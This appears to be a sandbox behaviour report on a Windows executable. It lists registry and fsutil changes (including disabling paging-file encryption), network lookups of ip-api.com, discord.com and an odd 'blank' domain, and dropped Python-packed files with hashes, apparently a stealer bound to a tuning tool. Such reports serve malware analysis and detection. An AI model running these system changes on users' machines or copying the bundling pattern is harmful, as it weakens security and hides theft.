reg add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t Reg_SZ /d "1000" /f

C:\Windows\system32\fsutil.exe

fsutil behavior set memoryusage 2

C:\Windows\system32\fsutil.exe

fsutil behavior set mftzone 2

C:\Windows\system32\fsutil.exe

fsutil behavior set disablelastaccess 1

C:\Windows\system32\fsutil.exe

fsutil behavior set encryptpagingfile 0

C:\Windows\system32\fsutil.exe

fsutil behavior set disable8dot3 1

C:\Windows\system32\fsutil.exe

fsutil behavior set disablecompression 1

C:\Windows\system32\fsutil.exe

fsutil behavior set disabledeletenotify 0

C:\Windows\system32\cmd.exe

cmd /V:ON /C @echo off

C:\Windows\system32\mode.com

Mode 65,16

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseSensitivity" /t REG_SZ /d "10" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve" /t REG_BINARY /d "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000" /f

C:\Windows\system32\control.exe

control.exe desk.cpl,Settings,@Settings

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL desk.cpl,Settings,@Settings

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" ms-settings:display

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseXCurve" /t REG_BINARY /d "0000000000000000C0CC0C0000000000809919000000000040662600000000000033330000000000" /f

C:\Windows\system32\cmd.exe

cmd /V:ON /C @echo off

C:\Windows\system32\mode.com

Mode 65,16

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 blank-uxlxa.in udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:50062 tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
NL 20.103.156.88:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:50118 tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
N/A 127.0.0.1:50124 tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:50128 tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 cxcs.microsoft.net udp
GB 184.50.112.58:443 www.bing.com tcp
GB 23.62.195.195:443 cxcs.microsoft.net tcp
US 8.8.8.8:53 195.195.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.112.50.184.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:50171 tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:50175 tcp
N/A 127.0.0.1:50179 tcp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 51.11.108.188:443 checkappexec.microsoft.com tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 188.108.11.51.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI22922\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI22922\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/3632-26-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\base_library.zip

MD5 bbbf46529c77f766ef219f4c146e6ef5
SHA1 de07c922c7f4ba08bc1a62cf3fabddecc64f877e
SHA256 734e277712e823fca86ca75bf5d4f85a21893208e683c4ab407be10c3b9052dc
SHA512 3371a3a806dac2cfec59cc42937b348af67e190a8d575efc6a81ec3d8b215f8a0cb94010142f9d02c8881040a2d6b8364d124f85285d9b3b04f36226fb4fae66

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI22922\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/3632-33-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\blank.aes

MD5 52b5788c281513d74bf5f1ee6a989cb8
SHA1 379318c37380fc6a3fbd50a66940cb44b9ff61e8
SHA256 c1e49817d2969a3ecd721eecefe95b4baa4583af4eecf550df32675685b6193f
SHA512 817927309fc3904565b5c48ac5efa9869338b7a318d1523f24b14abcf33a53aa64cb6eef481c7e1f98d5f2879503fc00bdfd16aa3ba141a0c9314c186f76ff05

memory/3632-31-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

memory/3632-41-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

memory/3632-45-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

memory/3632-48-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

memory/3632-50-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

memory/3632-53-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

memory/3632-57-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

C:\Users\Admin\AppData\Local\Temp\_MEI22922\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

memory/3632-61-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

memory/3632-64-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

memory/3632-67-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

memory/3632-66-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

memory/3632-70-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp

memory/3632-74-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

memory/3632-78-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\bound.blank

MD5 cad54859340aaefe3491c1e3bb6ab204
SHA1 751d2dd0769585f334d7b77c0b07a8c7051f91aa
SHA256 f7c3e0c208aa535125a233c7c2ced5aba53537ed6d093464c25bc68521d5082b
SHA512 482591d9f825812e8f5a2820b1c964076be8f5ca7e04281b40742ab66037c3e34936319bea8421585a140a9bf30c2c45eb3cbc9cf48b7bbf11488159ba9aa3d7

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

memory/3632-65-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_irzmcmp3.vtd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1772-88-0x000001D035BD0000-0x000001D035BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 927c47fb56b681f9395ba430ab47e311
SHA1 6cab388228bcb1f701fc6d3b7a256b8a259d2e26
SHA256 8f269626d102b795d411666f896b1227736815f38c0a952224db01ca2b30bf56
SHA512 b338a3138ce64d46ab608d095ef8a1358a054e5073f9d9de0c98e3f3f33e4cd843d223321d8e672b869c2171a6ee719e50e020ebff5c55e85f37cd199cac0383

memory/3632-109-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat

MD5 dac3246a897d2448c4b572f5a159cd0d
SHA1 15ff4f8282940fd6e448dcd2a1cb82ba1eab3a13
